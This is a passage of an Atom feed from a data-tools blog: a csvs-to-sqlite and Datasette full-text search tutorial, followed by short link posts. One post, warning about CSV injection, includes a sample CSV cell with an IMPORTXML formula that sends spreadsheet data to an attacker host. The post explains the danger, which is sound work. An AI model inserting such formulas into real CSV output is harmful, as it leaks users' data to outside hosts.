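UPDATE [Mobile_Food_Facility_Permit] SET &amp;quot;Applicant&amp;quot; = (
    SELECT &amp;quot;id&amp;quot; FROM &amp;quot;Applicant&amp;quot; AS lookup
    WHERE lookup.&amp;quot;value&amp;quot; = [Mobile_Food_Facility_Permit].&amp;quot;Applicant&amp;quot;
);
&lt;/code&gt;&lt;/pre&gt;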
&lt;p&gt;Having created the new database, you can use Datasette to browse it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;datasette food-trucks.db
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then browse to &lt;a href="http://127.0.0.1:8001/"&gt;http://127.0.0.1:8001/&lt;/a&gt; and start exploring.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Fulltext_search_with_Datasette_and_csvstosqlite_93"&gt;&lt;/a&gt;Full-text search with Datasette and csvs-to-sqlite&lt;/h3&gt;
&lt;p&gt;SQLite includes a powerful full-text search implementation in the form of the &lt;a href="https://sqlite.org/fts3.html"&gt;FTS3, FTS4&lt;/a&gt; and (in the most recent versions) &lt;a href="https://sqlite.org/fts5.html"&gt;FTS5&lt;/a&gt; modules.&lt;/p&gt;
&lt;p&gt;Datasette will look for tables that have an FTS virtual table configured against them and, if it detects one, will add support for a &lt;code&gt;_search=&lt;/code&gt; query string argument as well as a search box in the interface.&lt;/p&gt;
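&lt;p&gt;In these databases the virtual table is named after the content table with an &lt;code&gt;_fts&lt;/code&gt; suffix. A minimal sketch of creating one by hand, assuming FTS4 with an external content table (&lt;code&gt;csvs-to-sqlite&lt;/code&gt; automates this, as shown below):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE VIRTUAL TABLE [Film_Locations_in_San_Francisco_fts]
    USING fts4 (Title, Locations,
        content=&amp;quot;Film_Locations_in_San_Francisco&amp;quot;);
&lt;/code&gt;&lt;/pre&gt;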
&lt;p&gt;Here’s &lt;a href="https://san-francisco.datasettes.com/sf-film-locations/Film_Locations_in_San_Francisco?_search=coit+tower"&gt;an example of Datasette and SQLite FTS in action&lt;/a&gt;, this time using the DataSF list of &lt;a href="https://data.sfgov.org/Culture-and-Recreation/Film-Locations-in-San-Francisco/yitu-d5am"&gt;Film Locations in San Francisco&lt;/a&gt; provided by the San Francisco Film Commission.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://san-francisco.datasettes.com/sf-film-locations/Film_Locations_in_San_Francisco?_search=coit+tower"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/sf-film-locations-coit-tower.png" alt="Searching film locations for Coit Tower" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If you click on &amp;quot;&lt;a href="https://san-francisco.datasettes.com/sf-film-locations?sql=select+rowid%2C+%2A+from+Film_Locations_in_San_Francisco+where+rowid+in+%28select+rowid+from+%5BFilm_Locations_in_San_Francisco_fts%5D+where+%5BFilm_Locations_in_San_Francisco_fts%5D+match+%3Asearch%29+order+by+rowid+limit+101&amp;amp;search=coit+tower"&gt;View and edit SQL&lt;/a&gt;&amp;quot; you’ll see how the underlying query works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select rowid, *
from Film_Locations_in_San_Francisco
where rowid in (
    select rowid
    from [Film_Locations_in_San_Francisco_fts]
    where [Film_Locations_in_San_Francisco_fts] match :search
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;csvs-to-sqlite&lt;/code&gt; knows how to create the underlying FTS virtual tables from a specified list of columns. Here’s how to create the sf-film-locations database:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;csvs-to-sqlite \
    Film_Locations_in_San_Francisco.csv sf-film-locations.db \
    -c Title \
    -c &amp;quot;Release Year&amp;quot; \
    -c &amp;quot;Production Company&amp;quot; \
    -c &amp;quot;Distributor&amp;quot; \
    -c &amp;quot;Director&amp;quot; \
    -c &amp;quot;Writer&amp;quot; \
    -c &amp;quot;Actor 1:Actors&amp;quot; \
    -c &amp;quot;Actor 2:Actors&amp;quot; \
    -c &amp;quot;Actor 3:Actors&amp;quot; \
    -f Title \
    -f &amp;quot;Production Company&amp;quot; \
    -f Director \
    -f Writer \
    -f &amp;quot;Actor 1&amp;quot; \
    -f &amp;quot;Actor 2&amp;quot; \
    -f &amp;quot;Actor 3&amp;quot; \
    -f Locations \
    -f &amp;quot;Fun Facts&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-f&lt;/code&gt; options specify the columns that should be incorporated into the SQLite full-text search index. Note that the &lt;code&gt;-f&lt;/code&gt; argument can be combined with the &lt;code&gt;-c&lt;/code&gt; argument described above: if you extract a text column into a separate table, &lt;code&gt;csvs-to-sqlite&lt;/code&gt; can still incorporate data from that column into the full-text index it creates.&lt;/p&gt;
&lt;p&gt;I’m using another new feature above as well: the CSV file has three columns for actors, &lt;code&gt;Actor 1&lt;/code&gt;, &lt;code&gt;Actor 2&lt;/code&gt; and &lt;code&gt;Actor 3&lt;/code&gt;. I can tell the &lt;code&gt;-c&lt;/code&gt; column extractor to map each of those columns to the same underlying lookup table, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    -c &amp;quot;Actor 1:Actors&amp;quot; \
    -c &amp;quot;Actor 2:Actors&amp;quot; \
    -c &amp;quot;Actor 3:Actors&amp;quot; \
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you visit &lt;a href="https://san-francisco.datasettes.com/sf-film-locations-84594a7/Actors/3"&gt;the Eddie Murphy page&lt;/a&gt; you can see that he’s listed as Actor 1 in 14 rows and as Actor 2 in one.&lt;/p&gt;
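&lt;p&gt;Because all three actor columns reference the same &lt;code&gt;Actors&lt;/code&gt; table, you can compare them against a single id. Those counts come from queries along these lines, 3 being Eddie Murphy’s id in the lookup table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select
    (select count(*) from [Film_Locations_in_San_Francisco]
        where &amp;quot;Actor 1&amp;quot; = 3) as actor_1_rows,
    (select count(*) from [Film_Locations_in_San_Francisco]
        where &amp;quot;Actor 2&amp;quot; = 3) as actor_2_rows;
&lt;/code&gt;&lt;/pre&gt;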
&lt;h3&gt;&lt;a id="A_search_engine_for_trees_146"&gt;&lt;/a&gt;A search engine for trees!&lt;/h3&gt;
&lt;p&gt;One last demo, this time using my favourite CSV file from &lt;a href="http://data.sfgov.org"&gt;data.sfgov.org&lt;/a&gt;: the &lt;a href="https://data.sfgov.org/City-Infrastructure/Street-Tree-List/tkzw-k3nq"&gt;Street Tree List&lt;/a&gt;, published by the San Francisco Department of Public Works.&lt;/p&gt;
&lt;p&gt;This time, in addition to &lt;a href="https://san-francisco.datasettes.com/sf-trees-ebc2ad9/Street_Tree_List"&gt;publishing the database&lt;/a&gt; I also put together a custom UI for querying it, based on the &lt;a href="https://leaflet.github.io/Leaflet.markercluster/"&gt;Leaflet.markercluster&lt;/a&gt; library. You can try that out at &lt;a href="https://sf-tree-search.now.sh/"&gt;https://sf-tree-search.now.sh/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://sf-tree-search.now.sh/?q=polk%20st%20palm"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/sf-tree-search.png" alt="SF Tree Search" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here’s the command I used to create the database:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;csvs-to-sqlite Street_Tree_List.csv sf-trees.db \
    -c qLegalStatus \
    -c qSpecies \
    -c qSiteInfo \
    -c PlantType \
    -c qCaretaker \
    -c qCareAssistant \
    -f qLegalStatus \
    -f qSpecies \
    -f qAddress \
    -f qSiteInfo \
    -f PlantType \
    -f qCaretaker \
    -f qCareAssistant \
    -f PermitNotes
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once again, I’m extracting out specified columns and pointing the SQLite full-text indexer at a subset of them.&lt;/p&gt;
&lt;p&gt;Since the JavaScript search needs to pull back a subset of the overall data, I composed &lt;a href="https://san-francisco.datasettes.com/sf-trees?sql=select+Latitude%2C%0D%0A++++Longitude%2C%0D%0A++++qSpecies.value+as+qSpecies%2C%0D%0A++++qAddress%0D%0Afrom%0D%0A++++Street_Tree_List%0D%0A++++join+qSpecies%0D%0A++++++++on+Street_Tree_List.qSpecies+%3D+qSpecies.id%0D%0Awhere%0D%0A++++Street_Tree_List.rowid+in+%28%0D%0A++++++++select%0D%0A++++++++++++rowid%0D%0A++++++++from%0D%0A++++++++++++%5BStreet_Tree_List_fts%5D%0D%0A++++++++where+%5BStreet_Tree_List_fts%5D+match+%3Asearch%0D%0A++++%29%0D%0A&amp;amp;search=olive"&gt;a custom SQL query&lt;/a&gt; to drive those searches.&lt;/p&gt;
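&lt;p&gt;Decoded from that URL, the query joins the extracted &lt;code&gt;qSpecies&lt;/code&gt; lookup table back in and filters through the full-text index:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select Latitude,
    Longitude,
    qSpecies.value as qSpecies,
    qAddress
from
    Street_Tree_List
    join qSpecies
        on Street_Tree_List.qSpecies = qSpecies.id
where
    Street_Tree_List.rowid in (
        select rowid
        from [Street_Tree_List_fts]
        where [Street_Tree_List_fts] match :search
    )
&lt;/code&gt;&lt;/pre&gt;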
&lt;p&gt;The &lt;a href="https://github.com/simonw/sf-tree-search"&gt;full source code&lt;/a&gt; for my tree search demo is available on GitHub.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/search"&gt;search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="projects"/><category term="search"/><category term="sqlite"/><category term="datasette"/></entry><entry><title>harelba/q</title><link href="https://simonwillison.net/2017/Nov/25/q/#atom-tag" rel="alternate"/><published>2017-11-25T17:49:19+00:00</published><updated>2017-11-25T17:49:19+00:00</updated><id>https://simonwillison.net/2017/Nov/25/q/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/harelba/q"&gt;harelba/q&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
q is a neat command-line utility that lets you run SQL queries directly against CSV and TSV files. Internally it works by firing up an in-memory SQLite database, and as of the latest release (1.7.1) you can use the new --save-db-to-disk option to save that in-memory database to disk.
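&lt;p&gt;Typical usage looks something like this (a sketch; if I remember the flags right, &lt;code&gt;-H&lt;/code&gt; tells q the file has a header row and &lt;code&gt;-d&lt;/code&gt; sets the delimiter):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;q -H -d , &amp;quot;select count(*) from ./Street_Tree_List.csv&amp;quot;
&lt;/code&gt;&lt;/pre&gt;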

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/harelba/status/934192325907156992"&gt;Harel Ben-Attia&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="sqlite"/></entry><entry><title>csvs-to-sqlite: Refactoring columns into separate lookup tables</title><link href="https://simonwillison.net/2017/Nov/17/refactoring/#atom-tag" rel="alternate"/><published>2017-11-17T06:41:16+00:00</published><updated>2017-11-17T06:41:16+00:00</updated><id>https://simonwillison.net/2017/Nov/17/refactoring/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite/blob/e5263a53cce513bce7857c4e0f27aff769e0fe6d/README.md#refactoring-columns-into-separate-lookup-tables"&gt;csvs-to-sqlite: Refactoring columns into separate lookup tables&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I just shipped a new version of csvs-to-sqlite with the ability to extract specified columns into a separate SQLite lookup table by passing additional command-line arguments.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="projects"/></entry><entry><title>simonw/csvs-to-sqlite</title><link href="https://simonwillison.net/2017/Nov/13/csvs-to-sqlite/#atom-tag" rel="alternate"/><published>2017-11-13T06:49:45+00:00</published><updated>2017-11-13T06:49:45+00:00</updated><id>https://simonwillison.net/2017/Nov/13/csvs-to-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite"&gt;simonw/csvs-to-sqlite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I built a simple tool for bulk converting multiple CSV files into a SQLite database.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="github"/><category term="projects"/><category term="sqlite"/><category term="datasette"/></entry><entry><title>The Absurdly Underestimated Dangers of CSV Injection</title><link href="https://simonwillison.net/2017/Oct/10/csv/#atom-tag" rel="alternate"/><published>2017-10-10T04:13:46+00:00</published><updated>2017-10-10T04:13:46+00:00</updated><id>https://simonwillison.net/2017/Oct/10/csv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://georgemauer.net/2017/10/07/csv-injection.html"&gt;The Absurdly Underestimated Dangers of CSV Injection&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
This is horrifying. A plain old CSV file intended for import into Excel can embed formulas (a value prefixed with an equals symbol) which can execute system commands—with a big honking security prompt that most people will likely ignore. Even worse: they can embed IMPORTXML() functions that can silently leak data from the rest of the sheet to an external URL—and those will work against Google Sheets as well as Excel.
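&lt;p&gt;The payload can be a single cell. A contrived sketch (hypothetical attacker URL; the doubled quotes are CSV escaping):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Name,Comment
Alice,&amp;quot;=IMPORTXML(&amp;quot;&amp;quot;http://attacker.example/?leak=&amp;quot;&amp;quot;&amp;amp;A1,&amp;quot;&amp;quot;//a&amp;quot;&amp;quot;)&amp;quot;
&lt;/code&gt;&lt;/pre&gt;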


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="security"/></entry><entry><title>No PDFs!</title><link href="https://simonwillison.net/2009/Nov/1/pdfs/#atom-tag" rel="alternate"/><published>2009-11-01T12:04:36+00:00</published><updated>2009-11-01T12:04:36+00:00</updated><id>https://simonwillison.net/2009/Nov/1/pdfs/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://blog.sunlightfoundation.com/2009/06/05/no-pdfs/"&gt;No PDFs!&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The Sunlight Foundation point out that PDFs are a terrible way of implementing “more transparent government” due to their general lack of structure. At the Guardian (and I’m sure at other newspapers) we waste an absurd amount of time manually extracting data from PDF files and turning it into something more useful. Even CSV is significantly more useful for many types of information.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/adobe"&gt;adobe&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-data"&gt;open-data&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/opengovernment"&gt;opengovernment&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pdf"&gt;pdf&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sunlightfoundation"&gt;sunlightfoundation&lt;/a&gt;&lt;/p&gt;



</summary><category term="adobe"/><category term="csv"/><category term="open-data"/><category term="opengovernment"/><category term="pdf"/><category term="sunlightfoundation"/></entry></feed>